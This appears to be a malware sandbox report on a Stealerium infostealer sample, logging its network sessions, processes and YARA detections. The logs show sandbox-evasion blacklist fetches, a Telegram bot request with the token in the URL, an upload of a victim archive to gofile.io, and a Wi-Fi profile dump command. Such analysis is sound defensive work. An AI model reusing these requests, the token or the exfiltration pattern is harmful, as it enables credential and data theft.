Nov 29, 2024 12:28:26.574143887 CET | 1.1.1.1 | 192.168.2.4 | 0xe0ea | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 12:28:26.574143887 CET | 1.1.1.1 | 192.168.2.4 | 0xe0ea | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 12:28:28.600526094 CET | 1.1.1.1 | 192.168.2.4 | 0x90e4 | Name error (3) | 54.229.13.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 29, 2024 12:28:28.831883907 CET | 1.1.1.1 | 192.168.2.4 | 0x5ae7 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 12:28:31.446046114 CET | 1.1.1.1 | 192.168.2.4 | 0x291e | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 12:28:31.446046114 CET | 1.1.1.1 | 192.168.2.4 | 0x291e | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 12:28:32.993607998 CET | 1.1.1.1 | 192.168.2.4 | 0x2cc7 | Name error (3) | 54.229.13.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 29, 2024 12:28:34.701533079 CET | 1.1.1.1 | 192.168.2.4 | 0xd302 | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 12:28:37.091887951 CET | 1.1.1.1 | 192.168.2.4 | 0x6fe9 | No error (0) | store5.gofile.io | | 31.14.70.244 | A (IP address) | IN (0x0001) | false
                                                                                                                                                            • raw.githubusercontent.com
                                                                                                                                                            • api.telegram.org
                                                                                                                                                            • api.gofile.io
                                                                                                                                                            • store5.gofile.io
                                                                                                                                                            • icanhazip.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 104.16.185.241 | 80 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 12:28:31.567912102 CET | 63 | OUT | GET / HTTP/1.1
                                                                                                                                                            Host: icanhazip.com
                                                                                                                                                            Connection: Keep-Alive
Nov 29, 2024 12:28:32.753259897 CET | 535 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:32 GMT
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Content-Length: 13
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET
                                                                                                                                                            Set-Cookie: __cf_bm=v9d1hAw_nh0Pl2DAgbahnJ3kQUJjogJVFHQ0DKdpXjc-1732879712-1.0.1.1-Ig21JR8bkIlzTtgr_Ttp0JNGHkFydJI5rRW2ZyBlyWyAybirSAuim5y60yw5jwxxkMG1sLD_o4E3OGbylrQ7gA; path=/; expires=Fri, 29-Nov-24 11:58:32 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8ea2413b9f924385-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                            Data Ascii: 8.46.123.228


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 104.16.185.241 | 80 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 12:28:34.414151907 CET | 39 | OUT | GET / HTTP/1.1
                                                                                                                                                            Host: icanhazip.com
Nov 29, 2024 12:28:35.551759958 CET | 535 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:35 GMT
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Content-Length: 13
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET
                                                                                                                                                            Set-Cookie: __cf_bm=DrcwygmpUF1jpFG6m_OGTSU3zNEQdHV3vtmlcfOifKA-1732879715-1.0.1.1-UExHgDN4lOQyn40wdxcDknfX8U7GBmE4RxEnNLIopiR6b64Lk83fBPgmbODBtXPPfgiuznRn5KuIGEPdshZxWw; path=/; expires=Fri, 29-Nov-24 11:58:35 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8ea2414d2b17f5fa-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                            Data Ascii: 8.46.123.228


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 185.199.108.133 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:27 UTC | 120 | OUT | GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:28 UTC | 898 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1246
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "30981a4a96ce3533cb33ae7620077db7a4a8377cb1ef8fcfc8a07293fa2937d6"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 7E09:1CF27F:96EA1:A565C:67498FF6
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740067-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.156952,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: c6d28eadeb78637b3f8b9ee1c3005b9c67a97ed9
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 194
2024-11-29 11:28:28 UTC | 1246 | IN
                                                                                                                                                            Data Ascii: 29__HERE2G6C7Z612RO_8UVU2SN538K45KBK41_L5LXPA8ES5PECN6L15RPFT3HZ6BOS4O7U6BZP2Y2_6F44ADR76MPA937229H9G974ZZCY7A7TB9G6P784KD1KSK8NYGK3FL8Y3BSXKG9SF72FG79Z77DN4T_G31E46N_PHLNYGR_T9W5LHOAFRBR6TCAMD Radeon HD 8650GASPEED Graphics Famil


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 185.199.108.133 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:27 UTC | 124 | OUT | GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:28 UTC | 898 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 3145
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 1C9C:194CD0:60A15:6E989:67498FF6
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740025-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.097268,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: 290f52be9b7d73581df4f1b229f30bb8a3b67d96
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 100
2024-11-29 11:28:28 UTC | 1378 | IN
                                                                                                                                                            Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
2024-11-29 11:28:28 UTC | 1378 | IN
                                                                                                                                                            Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
2024-11-29 11:28:28 UTC | 389 | IN
                                                                                                                                                            Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49731 | 185.199.108.133 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:27 UTC | 128 | OUT | GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:28 UTC | 897 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1275
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "bbf75a064e165fba2b8fcc6595e496788fe27c3185ffa2fa56d3479e12867693"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: E854:128C4E:AEAFA:BD2CE:67498FF8
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740037-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.105303,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: 12bc791959b53f3b7b42f4e580ec1f3d5909ab6c
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 98


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49730 | 185.199.108.133 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:27 UTC | 126 | OUT | GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:28 UTC | 895 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 31
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "b8ccbe01df84b6df59046ff7ef97fe02bbba9374a7a63f24d1c8a0b07083adca"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: F0F4:35108B:983CD:A6B92:67498FF6
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740045-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 9
                                                                                                                                                            X-Timer: S1732879708.144868,VS0,VE0
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: b5940fa9df9272d1ad101b0370a2949fda2c7d16
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 22
2024-11-29 11:28:28 UTC | 31 | IN | Data Ascii:
VmRemoteGuest.exe
Sysmon64.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49735 | 185.199.108.133 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:27 UTC | 123 | OUT | GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:28 UTC | 897 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1110
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "1224175461dce581d971884e2b8af67d12f105702cbcc56be1043ccc84319e42"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: AD0E:370AE7:92613:A0DDF:67498FF8
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740034-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.154255,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: 4cbc6a08a38917a1997753704bbcb18e8195d8c7
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 22


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49734 | 185.199.108.133 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:27 UTC | 119 | OUT | GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:28 UTC | 898 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 2853
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: DDA6:287308:A00E2:AE8A6:67498FF6
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1732879708.198609,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Fastly-Request-ID: 1e2cc7ef7b49c53227aa621cf6e684b613c0f1d1
                                                                                                                                                            Expires: Fri, 29 Nov 2024 11:33:28 GMT
                                                                                                                                                            Source-Age: 194


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49736 | 149.154.167.220 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:30 UTC | 121 | OUT | GET /bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMe HTTP/1.1
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:30 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:30 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 252
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-29 11:28:30 UTC | 252 | IN | Data Ascii: {"ok":true,"result":{"id":7785245272,"is_bot":true,"first_name":"stealirum","username":"stealirum_bot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":false}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49739 | 45.112.123.126 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:36 UTC | 70 | OUT | GET /servers HTTP/1.1
                                                                                                                                                            Host: api.gofile.io
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:36 UTC | 1116 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.27.1
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:36 GMT
                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                            Content-Length: 387
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            Origin-Agent-Cluster: ?1
                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-DNS-Prefetch-Control: off
                                                                                                                                                            X-Download-Options: noopen
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            ETag: W/"183-Eu4ZgiiMPo3kPouaVtriWa7zHuE"
2024-11-29 11:28:36 UTC | 387 | IN | Data Ascii: {"status":"ok","data":{"servers":[{"name":"store5","zone":"eu"},{"name":"store1","zone":"eu"},{"name":"store10","zone":"eu"},{"name":"store2","zone":"eu"}],"serversAllZone":[{"name":"store3","zone":"na"},{"name":"store9","zone":"na"},{"name":"store8","zon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49740 | 31.14.70.244 | 443 | 6400 | C:\Users\user\Desktop\K6aOw2Jmji.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 11:28:38 UTC | 207 | OUT | POST /uploadfile HTTP/1.1
                                                                                                                                                            Content-Type: multipart/form-data; boundary="807f9f0a-5cc3-4dc0-ad4d-1aa9765d148e"
                                                                                                                                                            Host: store5.gofile.io
                                                                                                                                                            Content-Length: 118763
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            Connection: Keep-Alive
2024-11-29 11:28:38 UTC | 40 | OUT | Data Ascii: --807f9f0a-5cc3-4dc0-ad4d-1aa9765d148e
2024-11-29 11:28:38 UTC | 123 | OUT | Data Ascii: Content-Disposition: form-data; name=file; filename="user@910646_en-CH.zip"; filename*=utf-8''user%40910646_en-CH.zip
2024-11-29 11:28:39 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-11-29 11:28:40 UTC | 536 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                            Server: nginx/1.27.2
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:40 GMT
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Content-Length: 27
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                            Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            error-createFolderResponse



                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:06:28:24
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\K6aOw2Jmji.exe"
                                                                                                                                                            Imagebase:0x267e6f40000
                                                                                                                                                            File size:3'747'840 bytes
                                                                                                                                                            MD5 hash:98A0C65BC0FE05D40971716FFD216519
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                            Imagebase:0x7ff7aa1b0000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x7ff7af750000
                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
